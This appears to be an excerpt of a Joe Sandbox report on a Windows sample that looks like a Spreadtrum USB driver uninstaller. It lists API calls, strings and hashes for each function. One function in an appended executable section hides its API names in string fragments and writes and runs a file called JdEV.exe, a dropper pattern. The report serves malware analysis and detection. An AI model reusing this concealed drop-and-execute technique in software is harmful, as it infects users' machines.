GetProcAddress.KERNEL32(?,DrawThemeTextEx), ref: 004DEE5E
GetProcAddress.KERNEL32(?,BufferedPaintInit), ref: 004DEE71
GetProcAddress.KERNEL32(?,BufferedPaintUnInit), ref: 004DEE84
GetProcAddress.KERNEL32(?,BeginBufferedPaint), ref: 004DEE97
GetProcAddress.KERNEL32(?,EndBufferedPaint), ref: 004DEEAA
GetProcAddress.KERNEL32(00000000,DwmExtendFrameIntoClientArea), ref: 004DEEF3
GetProcAddress.KERNEL32(?,DwmDefWindowProc), ref: 004DEF06
GetProcAddress.KERNEL32(?,DwmIsCompositionEnabled), ref: 004DEF19

Strings

BufferedPaintInit, xrefs: 004DEE60
BufferedPaintUnInit, xrefs: 004DEE73
DwmIsCompositionEnabled, xrefs: 004DEF08
DrawThemeParentBackground, xrefs: 004DEE45
dwmapi.dll, xrefs: 004DEED8
DwmDefWindowProc, xrefs: 004DEEF5
EndBufferedPaint, xrefs: 004DEE99
DwmExtendFrameIntoClientArea, xrefs: 004DEEED
UxTheme.dll, xrefs: 004DEE2A
BeginBufferedPaint, xrefs: 004DEE86
DrawThemeTextEx, xrefs: 004DEE4D

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Object$Font$CreateDeleteIndirect$AddressProc$lstrcpy$EnumFamiliesH_prolog3H_prolog3_Stock$CallbackCapsCharsetDeviceDispatcherException@8InfoMetricsSystemTextThrowUserVersionWindow_memset
String ID: BeginBufferedPaint$BufferedPaintInit$BufferedPaintUnInit$DrawThemeParentBackground$DrawThemeTextEx$DwmDefWindowProc$DwmExtendFrameIntoClientArea$DwmIsCompositionEnabled$EndBufferedPaint$UxTheme.dll$dwmapi.dll
API String ID: 283818339-1174303547
Opcode ID: eb22e357544f3ca0fdd028abd97c420673e77450c9c809f81625a44e5c5380f8
Instruction ID: 06b06a0710c032e244cc608428b5c55c23e898d1334e232512d9c7d5a0e5b851
Opcode Fuzzy Hash: eb22e357544f3ca0fdd028abd97c420673e77450c9c809f81625a44e5c5380f8
Instruction Fuzzy Hash: CF3236B08007189ECB21AFB6C854BEAFBF8BF54304F00495FE56A9B251DB746540CF54

Function 004D2540 Relevance: 42.4, APIs: 19, Strings: 5, Instructions: 445
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetupDiGetClassDevsW.SETUPAPI(00000000,00000000,00000000,00000004), ref: 004D2572
SetupDiEnumDeviceInfo.SETUPAPI(00000000,00000000,0000001C), ref: 004D25C2
GetLastError.KERNEL32 ref: 004D25D6
GetLastError.KERNEL32 ref: 004D25E0
GetLastError.KERNEL32 ref: 004D25ED
SetupDiGetDeviceRegistryPropertyW.SETUPAPI(00000000,0000001C,00000001,00000000,00000000,00000000,?), ref: 004D2681
GetLastError.KERNEL32 ref: 004D268D
GetLastError.KERNEL32 ref: 004D2694
LocalFree.KERNEL32(?), ref: 004D26A7
LocalAlloc.KERNELBASE(00000040,?), ref: 004D26B4
SetupDiGetDeviceRegistryPropertyW.SETUPAPI(?,0000001C,00000001,00000000,00000000,?,?), ref: 004D26DC
GetLastError.KERNEL32 ref: 004D26EA
SetupDiDestroyDeviceInfoList.SETUPAPI(?), ref: 004D29F3

Strings

Remove , xrefs: 004D286D, 004D291F
VID_1782, xrefs: 004D2798
enum device err :, xrefs: 004D25F0
VID_0525, xrefs: 004D27BD
VID_18D1&PID_4EE7, xrefs: 004D27E2, 004D2807

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: ErrorLast$Setup$Device$InfoLocalPropertyRegistry$AllocClassDestroyDevsEnumFreeList
String ID: Remove $VID_0525$VID_1782$VID_18D1&PID_4EE7$enum device err :
API String ID: 3295277273-2904152880
Opcode ID: 5dd27bbf3add56bbce25bfd85f0f23f32086c0900f7f381aac5d3e225a33fdf9
Instruction ID: a4e65049ccf5a2eab9cf80a4e0fff53482fba0b4d4344b4de1ad92b2a17ac72c
Opcode Fuzzy Hash: 5dd27bbf3add56bbce25bfd85f0f23f32086c0900f7f381aac5d3e225a33fdf9
Instruction Fuzzy Hash: 1CE10371A00201AFDB10DB64CDA5F7E77A5EFA4724F14465BE811EB390DAB8ED02CB64

Function 00676044 Relevance: 33.4, APIs: 4, Strings: 15, Instructions: 171
fileprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00676223
WriteFile.KERNELBASE(00000000,FFF58236,00003E00,?,00000000), ref: 00676252
CloseHandle.KERNELBASE(00000000), ref: 00676256
WinExec.KERNEL32(?,00000005), ref: 00676262

Strings

catA, xrefs: 006761AF
Clos, xrefs: 00676129
Writ, xrefs: 00676148
.dll, xrefs: 00676102
JdEV.exe, xrefs: 006761FD, 00676200
athA, xrefs: 00676199
WinE, xrefs: 00676110
odul, xrefs: 0067622D
Crea, xrefs: 00676169
lstr, xrefs: 006761A7
GetM, xrefs: 006760B6
GetT, xrefs: 00676188
el32, xrefs: 006760FB
dleA, xrefs: 006760D0
Kern, xrefs: 006760F4

Memory Dump Source

Source File: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: File$CloseCreateExecHandleWrite
String ID: .dll$Clos$Crea$GetM$GetT$JdEV.exe$Kern$WinE$Writ$athA$catA$dleA$el32$lstr$odul
API String ID: 3741012433-349371505
Opcode ID: 0d78d3566c40cb484947d4d33a09a86410937cd62f88d763635a65b8d9c49c74
Instruction ID: abebfaf40155dee4037584fc8cb39b384b0c4be7ac4db507482e94279fd4479d
Opcode Fuzzy Hash: 0d78d3566c40cb484947d4d33a09a86410937cd62f88d763635a65b8d9c49c74
Instruction Fuzzy Hash: A7610B74D01615DBCF24CF98C888AEDB7B6BF44316F65C1AAE409A7702C7709E81CB95

Function 004DB7F2 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 124
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(?,?,00000000,00000000), ref: 004DB85E
SetLastError.KERNEL32(0000007B,00000000,?,?,00000104,?,?,?,00000000,00000000), ref: 004DB86D

Part of subcall function 004D8E6A: _malloc.LIBCMT ref: 004D8E88

FindFirstFileW.KERNELBASE(?,?,?,?,?,00000000,00000000), ref: 004DB87A
GetLastError.KERNEL32(?,?,?,00000000,00000000), ref: 004DB888
__wfullpath.LIBCMT ref: 004DB8D4
__wsplitpath_s.LIBCMT ref: 004DB914
__wmakepath_s.LIBCMT ref: 004DB933

Part of subcall function 004DB3FE: GetModuleHandleW.KERNEL32(kernel32.dll,?,00000104,?,004DB85B,?,?,?,?,?,00000000,00000000), ref: 004DB412
Part of subcall function 004DB3FE: GetProcAddress.KERNEL32(00000000,FindFirstFileTransactedW), ref: 004DB422

Strings

8)b, xrefs: 004DB827, 004DB834, 004DB851

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: ErrorLast$AddressFileFindFirstHandleModuleProc__wfullpath__wmakepath_s__wsplitpath_s_malloclstrlen
String ID: 8)b
API String ID: 1521982810-851702437
Opcode ID: ca7fc2a4c63549f3c8fe507aeb6e496ae91c3e34c1cb50b4dc05ce8188199a51
Instruction ID: 81db31126b4a9420da670e253c826e45320fc8f546ec1c17401371a4891a0b6f
Opcode Fuzzy Hash: ca7fc2a4c63549f3c8fe507aeb6e496ae91c3e34c1cb50b4dc05ce8188199a51
Instruction Fuzzy Hash: A341D571900204FBCB10BB628CA9EAF7BADEF59314F00056FF516D2392DB789940DBA4

Function 004D1020 Relevance: 97.2, APIs: 31, Strings: 24, Instructions: 952filestringCOMMON

Download Yara Rule

APIs

GetCommandLineW.KERNEL32(00000000,9E026D90), ref: 004D1057
GetModuleHandleW.KERNEL32(00000000,00000000,00000000), ref: 004D1060

Part of subcall function 004DA2C5: SetErrorMode.KERNELBASE(00000000,?,?,004D106C,00000000), ref: 004DA2D3
Part of subcall function 004DA2C5: SetErrorMode.KERNELBASE(00000000,?,?,004D106C,00000000), ref: 004DA2DB

_wprintf.LIBCMT ref: 004D1075
GetWindowsDirectoryW.KERNEL32(?,00000104,00622A58,00000000), ref: 004D10D0
GetLastError.KERNEL32 ref: 004D10DE
_wcsnlen.LIBCMT ref: 004D11A9
_memset.LIBCMT ref: 004D1245
_wcsrchr.LIBCMT ref: 004D12E8
lstrlenW.KERNEL32(?,?,00000001,?,?), ref: 004D13BF
WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?,?,00000000,00000000,?,?), ref: 004D13ED
lstrlenW.KERNEL32(?,0000000A,?,?,?,00000001,?,?), ref: 004D148F
WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?,00000000,00000000,00000000,?,?,?,00000001,?,?), ref: 004D14BD
SetupUninstallOEMInfW.SETUPAPI(?,00000001,00000000,0000000A,?,?,?,0000000A,?,?,?,00000001,?,?), ref: 004D153F
lstrlenW.KERNEL32(00000000,0000000A,00000000,?,00000000,?,?,?,0000000A,?,?,?,00000001,?,?), ref: 004D15C4
WideCharToMultiByte.KERNEL32(00000003,00000000,00000000,000000FF,?,?,00000000,00000000,?,00000000,?,?,?,0000000A), ref: 004D15F2
DeleteFileW.KERNEL32(?,0000000A,?,?,?,00000000,?,00000000,?,?,?,0000000A,?,?,?,00000001), ref: 004D168A
DeleteFileW.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,0000000A,?,?,?,00000001), ref: 004D1693
DeleteFileW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004D1715
DeleteFileW.KERNELBASE(?), ref: 004D1757
DeleteFileW.KERNELBASE(?), ref: 004D1799
DeleteFileW.KERNELBASE(?), ref: 004D17DB

Part of subcall function 004D1FF0: SetupOpenInfFileW.SETUPAPI(?,00000000,00000002,00000000), ref: 004D2089

DeleteFileW.KERNELBASE(?), ref: 004D181D
DeleteFileW.KERNELBASE(?), ref: 004D185F
DeleteFileW.KERNELBASE(?), ref: 004D18A1
DeleteFileW.KERNELBASE(?), ref: 004D18E3
DeleteFileW.KERNELBASE(?), ref: 004D1925
DeleteFileW.KERNELBASE(?), ref: 004D1967
DeleteFileW.KERNELBASE(?), ref: 004D19A9
DeleteFileW.KERNELBASE(?), ref: 004D19EB
DeleteFileW.KERNELBASE(?), ref: 004D1A2D
DeleteFileW.KERNELBASE(?), ref: 004D1A6F

Strings

Remove , xrefs: 004D154E, 004D160F
\sprd_enum.sys, xrefs: 004D1907
\system32\drivers, xrefs: 004D16D5
\sprdvcom.sys, xrefs: 004D16ED
\rdavcom.sys, xrefs: 004D177B
.inf, xrefs: 004D1D0A
\sprd_rdavcom.sys, xrefs: 004D1949
\sprdvcomIOT.sys, xrefs: 004D1A0F
\sprdmodem.sys, xrefs: 004D1883
\usbcommsprdserial.sys, xrefs: 004D1A51
\sprdvmdm.sys, xrefs: 004D1739
\sprd_acm.sys, xrefs: 004D18C5
\sprdbus.sys, xrefs: 004D1841
*.*, xrefs: 004D1C15
\sprd_wvcom.sys, xrefs: 004D198B
oem, xrefs: 004D1CBD
Fatal Error: MFC initialization failed, xrefs: 004D1070
GetWindowsDirectory error:, xrefs: 004D10E5
\sprdmux.sys, xrefs: 004D17FF
\sprd_wvmdm.sys, xrefs: 004D19CD
\inf, xrefs: 004D11FD
\sprdport.sys, xrefs: 004D17BD
vector<T> too long, xrefs: 004D1FDB
Uninstall , xrefs: 004D13FE, 004D14CE

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: File$Delete$ByteCharErrorMultiWidelstrlen$ModeSetup$CommandDirectoryHandleLastLineModuleOpenUninstallWindows_memset_wcsnlen_wcsrchr_wprintf
String ID: *.*$.inf$Fatal Error: MFC initialization failed$GetWindowsDirectory error:$Remove $Uninstall $\inf$\rdavcom.sys$\sprd_acm.sys$\sprd_enum.sys$\sprd_rdavcom.sys$\sprd_wvcom.sys$\sprd_wvmdm.sys$\sprdbus.sys$\sprdmodem.sys$\sprdmux.sys$\sprdport.sys$\sprdvcom.sys$\sprdvcomIOT.sys$\sprdvmdm.sys$\system32\drivers$\usbcommsprdserial.sys$oem$vector<T> too long
API String ID: 254025050-3392595036
Opcode ID: e8a343ba00fdb4057e017a841646633d066c06106b5cb26daf8df5c1b425769b
Instruction ID: 395de4598db7f3219fb97f2e22c7656a338d9d4c8a2f0f9f52a80a3ae4dcf046
Opcode Fuzzy Hash: e8a343ba00fdb4057e017a841646633d066c06106b5cb26daf8df5c1b425769b
Instruction Fuzzy Hash: 7572E270A00611AFD710DB68CCA5F6AB3B5BF99324F14829AE4199B3E1DB34ED41CF94

Function 004DE141 Relevance: 64.8, APIs: 43, Instructions: 304
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 004DE148
GetSysColor.USER32(00000016), ref: 004DE157
GetSysColor.USER32(0000000F), ref: 004DE164
GetSysColor.USER32(00000015), ref: 004DE177
GetSysColor.USER32(0000000F), ref: 004DE17F
GetDeviceCaps.GDI32(?,0000000C), ref: 004DE1A5
GetSysColor.USER32(0000000F), ref: 004DE1B3
GetSysColor.USER32(00000010), ref: 004DE1BD
GetSysColor.USER32(00000015), ref: 004DE1C7
GetSysColor.USER32(00000016), ref: 004DE1D1
GetSysColor.USER32(00000014), ref: 004DE1DB
GetSysColor.USER32(00000012), ref: 004DE1E5
GetSysColor.USER32(00000011), ref: 004DE1EF
GetSysColor.USER32(00000006), ref: 004DE1F6
GetSysColor.USER32(0000000D), ref: 004DE1FD
GetSysColor.USER32(0000000E), ref: 004DE204
GetSysColor.USER32(00000005), ref: 004DE20B
GetSysColor.USER32(00000008), ref: 004DE215
GetSysColor.USER32(00000009), ref: 004DE21C
GetSysColor.USER32(00000007), ref: 004DE223
GetSysColor.USER32(00000002), ref: 004DE22A
GetSysColor.USER32(00000003), ref: 004DE231
GetSysColor.USER32(0000001B), ref: 004DE238
GetSysColor.USER32(0000001C), ref: 004DE242
GetSysColor.USER32(0000000A), ref: 004DE24C
GetSysColor.USER32(0000000B), ref: 004DE256
GetSysColor.USER32(00000013), ref: 004DE260
GetSysColor.USER32(0000001A), ref: 004DE27A
GetSysColorBrush.USER32(00000010), ref: 004DE295
GetSysColorBrush.USER32(00000014), ref: 004DE2AC
GetSysColorBrush.USER32(00000005), ref: 004DE2BE
CreateSolidBrush.GDI32(?), ref: 004DE2E2
CreateSolidBrush.GDI32(?), ref: 004DE2FE
CreateSolidBrush.GDI32(?), ref: 004DE31A
CreateSolidBrush.GDI32(?), ref: 004DE336
CreateSolidBrush.GDI32(?), ref: 004DE352
CreateSolidBrush.GDI32(?), ref: 004DE36E
CreateSolidBrush.GDI32(?), ref: 004DE38A
CreatePen.GDI32(00000000,00000001), ref: 004DE3B3
CreatePen.GDI32(00000000,00000001), ref: 004DE3D6
CreatePen.GDI32(00000000,00000001), ref: 004DE3F9
CreateSolidBrush.GDI32(?), ref: 004DE47D
CreatePatternBrush.GDI32(00000000), ref: 004DE4BE

Part of subcall function 004E0636: DeleteObject.GDI32(00000000), ref: 004E0645

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Color$BrushCreate$Solid$CapsDeleteDeviceH_prolog3ObjectPattern
String ID:
API String ID: 3754413814-0
Opcode ID: 3491b6201aec06d5d4d6505ec1c9729154e2df45d0926fcdbfa34855ed77d255
Instruction ID: e0d0a18ae3a40e1f2608217ebc691910f367d7c87bec035571a0b376f4a42abd
Opcode Fuzzy Hash: 3491b6201aec06d5d4d6505ec1c9729154e2df45d0926fcdbfa34855ed77d255
Instruction Fuzzy Hash: C8B18E70900B85AED730FF72CC55BABBAE0AF80700F00492FE19796691DEB9A549DF54

Function 00547836 Relevance: 42.4, APIs: 22, Strings: 2, Instructions: 421
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 00547840
LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002000), ref: 00547A02
GetObjectW.GDI32(00000082,00000018,?), ref: 00547A14
CreateCompatibleDC.GDI32(00000000), ref: 00547A66
GetObjectW.GDI32(00000082,00000018,?), ref: 00547A81
SelectObject.GDI32(?,00000082), ref: 00547A95
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00547AB9
SelectObject.GDI32(?,00000000), ref: 00547ACC
CreateCompatibleDC.GDI32(?), ref: 00547AE2
SelectObject.GDI32(?,?), ref: 00547AF7
SelectObject.GDI32(?,00000000), ref: 00547B06
DeleteObject.GDI32(?), ref: 00547B0B
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00547B2B
GetPixel.GDI32(?,?,?), ref: 00547B4A
SetPixel.GDI32(?,?,?,00000000), ref: 00547B80
SelectObject.GDI32(?,?), ref: 00547BA2
SelectObject.GDI32(?,00000000), ref: 00547BAA
DeleteObject.GDI32(00000082), ref: 00547BAF
DeleteObject.GDI32(00000082), ref: 00547BE1
__EH_prolog3.LIBCMT ref: 00547C15
CreateCompatibleDC.GDI32(00000000), ref: 00547CE0
CreateCompatibleDC.GDI32(00000000), ref: 00547CEC

Strings

, xrefs: 00547A1A
TR`, xrefs: 005479BB

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Object$Select$CompatibleCreate$Delete$H_prolog3Pixel$BitmapImageLoad
String ID: $TR`
API String ID: 1197801157-2251896978
Opcode ID: 2f5f34bf517c139619c30be78d7b6b6189184353f727cb6781c5cd578d7af454
Instruction ID: 7fd2ca687c9b506f4ee72ce71f8d356f76ea16cdd73b8c2623481439aae153f0
Opcode Fuzzy Hash: 2f5f34bf517c139619c30be78d7b6b6189184353f727cb6781c5cd578d7af454
Instruction Fuzzy Hash: FF025870D00229DFCF15DFA5C884AEEBFB6FF09704F10856AE805AA256DB748945DFA0

Function 004DA0E9 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,00000000), ref: 004DA126
PathFindExtensionW.SHLWAPI(?,?,?,00000000), ref: 004DA140
__wcsdup.LIBCMT ref: 004DA18A
__wcsdup.LIBCMT ref: 004DA1C8
__wcsdup.LIBCMT ref: 004DA1FC
__wcsdup.LIBCMT ref: 004DA262
__wcsdup.LIBCMT ref: 004DA2A3

Strings

.CHM, xrefs: 004DA23A
X*b, xrefs: 004DA207
.INI, xrefs: 004DA284
.HLP, xrefs: 004DA241

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: __wcsdup$ExtensionFileFindModuleNamePath
String ID: .CHM$.HLP$.INI$X*b
API String ID: 2477486372-2342915792
Opcode ID: fd75f21c229430202632496f4598d6f2d2cfe988c0d5911fba89c33af4be3055
Instruction ID: 942bf3c4ed0a129aa0bf6bd8aa65efabc2e2fbc4b48d735ccbb381f33d03e460
Opcode Fuzzy Hash: fd75f21c229430202632496f4598d6f2d2cfe988c0d5911fba89c33af4be3055
Instruction Fuzzy Hash: 485180709007099ECB20EB75CC59BAB77ECBF44704F0048AFA546D2351EB78D994CB6A

Function 004E1323 Relevance: 16.6, APIs: 11, Instructions: 106
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(00643518,?,?,00000000,006434FC,006434FC,?,004E1686,00000004,004DF886,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E1336
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,00000000,006434FC,006434FC,?,004E1686,00000004,004DF886,004DAD1B,004DA2E2,?,?,004D106C), ref: 004E138C
GlobalHandle.KERNEL32(00C76BD8), ref: 004E1395
GlobalUnlock.KERNEL32(00000000), ref: 004E139F
GlobalReAlloc.KERNEL32(?,00000000,00002002), ref: 004E13B8
GlobalHandle.KERNEL32(00C76BD8), ref: 004E13CA
GlobalLock.KERNEL32(00000000), ref: 004E13D1
LeaveCriticalSection.KERNEL32(?,?,?,00000000,006434FC,006434FC,?,004E1686,00000004,004DF886,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E13DA
GlobalLock.KERNEL32(00000000), ref: 004E13E6
_memset.LIBCMT ref: 004E1400
LeaveCriticalSection.KERNEL32(?), ref: 004E142E

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
String ID:
API String ID: 496899490-0
Opcode ID: 72847f8a47570cbdb6c21f46cc393079c67067f6e06d411e7eb0dc623fddee7e
Instruction ID: a0642e20be994aec857152caf3501acd8852c64be1fbc436cebdc09d050ba086
Opcode Fuzzy Hash: 72847f8a47570cbdb6c21f46cc393079c67067f6e06d411e7eb0dc623fddee7e
Instruction Fuzzy Hash: 9B31AF71640704AFDB209F66DC89A6EBBF9FF44705B05492EE942D36B0DB38E808CB54

Function 0055BD98 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 0055BD9F

Part of subcall function 004E61F6: EnterCriticalSection.KERNEL32(00643728,?,?,00000000,?,004E124C,00000010,00000008,004DF8A5,004DF83C,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E6230
Part of subcall function 004E61F6: InitializeCriticalSection.KERNEL32(?,?,?,00000000,?,004E124C,00000010,00000008,004DF8A5,004DF83C,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E6242
